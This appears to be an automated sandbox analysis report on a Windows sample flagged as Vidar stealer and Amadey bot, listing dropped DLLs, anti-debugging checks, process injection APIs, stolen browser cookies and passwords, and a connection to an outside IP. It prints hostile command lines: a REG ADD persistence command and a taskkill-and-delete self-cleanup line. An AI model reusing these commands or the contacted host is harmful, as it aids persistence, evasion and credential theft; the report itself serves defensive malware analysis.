                              Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior

                              Hooking and other Techniques for Hiding and Protection:

                              barindex
                              Creates files in alternative data streams (ADS)Show sources
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile created: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe:Zone.IdentifierJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0045F4A8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0045F4A8
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\vcruntime140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\scr[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\mozglue[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\ProgramData\msvcp140.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\freebl3[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\softokn3[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\msvcp140[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeDropped PE file which has not been started: C:\ProgramData\1a9f26b569d5df\scr.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\ProgramData\vcruntime140.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\nss3[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                              Source: C:\Windows\SysWOW64\timeout.exe TID: 5720Thread sleep count: 52 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 4864Thread sleep time: -330000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6680Thread sleep count: 227 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6680Thread sleep time: -13620000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6804Thread sleep count: 252 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6804Thread sleep time: -15120000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6732Thread sleep count: 309 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6732Thread sleep time: -18540000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 4864Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6680Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe TID: 6804Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0045C719 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0045C844h0_2_0045C719
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040657E __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,0_2_0040657E
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_00404905 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,0_2_00404905
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0045F3B6 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,0_2_0045F3B6
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_00405437 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,0_2_00405437
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040F7AE _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,0_2_0040F7AE
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040F998 __EH_prolog3,__wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,0_2_0040F998
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_00419F82 FindFirstFileExW,5_2_00419F82
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0211A1D2 FindFirstFileExW,5_2_0211A1D2
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_00419F82 FindFirstFileExW,10_2_00419F82
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0223A1D2 FindFirstFileExW,10_2_0223A1D2
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_00406917 _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,0_2_00406917
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0042F155 GetSystemInfo,0_2_0042F155
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                              Source: reg.exe, 0000000F.00000002.724315962.00000000038C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700263265.000000000085B000.00000004.00000001.sdmp, blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                              Source: reg.exe, 0000000F.00000002.724315962.00000000038C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                              Source: reg.exe, 0000000F.00000002.724315962.00000000038C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                              Source: rundll32.exe, 00000015.00000002.924514689.00000000027AA000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: reg.exe, 0000000F.00000002.724315962.00000000038C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_00413948 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00413948
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040EBA8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,FreeLibrary,0_2_0040EBA8
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_004000A5 mov eax, dword ptr fs:[00000030h]0_2_004000A5
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_00411081 mov eax, dword ptr fs:[00000030h]5_2_00411081
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_00414E12 mov eax, dword ptr fs:[00000030h]5_2_00414E12
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0210092B mov eax, dword ptr fs:[00000030h]5_2_0210092B
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_021112D1 mov eax, dword ptr fs:[00000030h]5_2_021112D1
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_02115062 mov eax, dword ptr fs:[00000030h]5_2_02115062
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_02100D90 mov eax, dword ptr fs:[00000030h]5_2_02100D90
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_00411081 mov eax, dword ptr fs:[00000030h]10_2_00411081
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_00414E12 mov eax, dword ptr fs:[00000030h]10_2_00414E12
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_022312D1 mov eax, dword ptr fs:[00000030h]10_2_022312D1
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_02235062 mov eax, dword ptr fs:[00000030h]10_2_02235062
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0222092B mov eax, dword ptr fs:[00000030h]10_2_0222092B
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_02220D90 mov eax, dword ptr fs:[00000030h]10_2_02220D90
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_00408B9A GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,0_2_00408B9A
                              Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_00413948 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00413948
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0040F2C2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0040F2C2
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0040F427 SetUnhandledExceptionFilter,5_2_0040F427
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0040F673 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040F673
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_02113B98 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_02113B98
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0210F8C3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0210F8C3
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0210F512 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0210F512
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_00413948 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00413948
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0040F2C2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0040F2C2
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0040F427 SetUnhandledExceptionFilter,10_2_0040F427
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0040F673 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040F673
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_02233B98 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_02233B98
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0222F8C3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0222F8C3
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0222F512 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0222F512

                              HIPS / PFW / Operating System Protection Evasion:

                              barindex
                              System process connects to network (likely due to code injection or exploit)Show sources
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.4 80Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 176.111.174.114 80Jump to behavior
                              Contains functionality to inject code into remote processesShow sources
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_004020D0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,5_2_004020D0
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_02102AF0 ShellExecuteA,5_2_02102AF0
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeProcess created: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe 'C:\ProgramData\M7WCJ84VE5TXJ0R4.exe' Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im wKYTg7Gp6P.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' & del C:\ProgramData\*.dll & exitJump to behavior
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeProcess created: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe 'C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe' Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im wKYTg7Gp6P.exe /f Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6 Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, MainJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\scr.dll, MainJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im wKYTg7Gp6P.exe /f Jump to behavior
                              Source: blfte.exe, 0000000A.00000002.924480417.0000000000E10000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.924714424.0000000002AA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                              Source: blfte.exe, 0000000A.00000002.924480417.0000000000E10000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.924714424.0000000002AA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                              Source: blfte.exe, 0000000A.00000002.924480417.0000000000E10000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.924714424.0000000002AA0000.00000002.00000001.sdmpBinary or memory string: Progman
                              Source: blfte.exe, 0000000A.00000002.924480417.0000000000E10000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.924714424.0000000002AA0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0040F0E2 cpuid 5_2_0040F0E2
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: __EH_prolog3,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memset,LocalFree,0_2_0045C719
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: GetLocaleInfoA,0_2_00466103
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_004743A2
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_00474690
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Autofill\Google Chrome_Default.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\CC\Google Chrome_Default.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Cookies\Edge_Cookies.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Cookies\Google Chrome_Default.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Cookies\IE_Cookies.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\Files\Default.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\History\Google Chrome_Default.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\information.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\passwords.txt VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeQueries volume information: C:\ProgramData\CU50S1CYVL0A4WGXHOO1KFZGQ\files\screenshot.jpg VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeQueries volume information: C:\ProgramData\1a9f26b569d5df\cred.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeQueries volume information: C:\ProgramData\1a9f26b569d5df\cred.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeQueries volume information: C:\ProgramData\1a9f26b569d5df\scr.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeQueries volume information: C:\ProgramData\1a9f26b569d5df\scr.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0045C662 __EH_prolog3_GS,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,0_2_0045C662
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0045C174 GetUserNameA,0_2_0045C174
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0045C662 __EH_prolog3_GS,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,0_2_0045C662
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_00403C30 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics,5_2_00403C30
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Stealing of Sensitive Information:

                              barindex
                              Yara detected Amadey botShow sources
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: blfte.exe PID: 5756, type: MEMORY
                              Yara detected Amadeys stealer DLLShow sources
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: C:\ProgramData\1a9f26b569d5df\cred.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dll, type: DROPPED
                              Yara detected Vidar stealerShow sources
                              Source: Yara matchFile source: 00000000.00000003.659819807.0000000002250000.00000004.00000001.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.700376910.0000000002180000.00000040.00000001.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: wKYTg7Gp6P.exe PID: 6924, type: MEMORY
                              Source: Yara matchFile source: 0.2.wKYTg7Gp6P.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.wKYTg7Gp6P.exe.2250000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.wKYTg7Gp6P.exe.2250000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.wKYTg7Gp6P.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.wKYTg7Gp6P.exe.2180e50.1.unpack, type: UNPACKEDPE
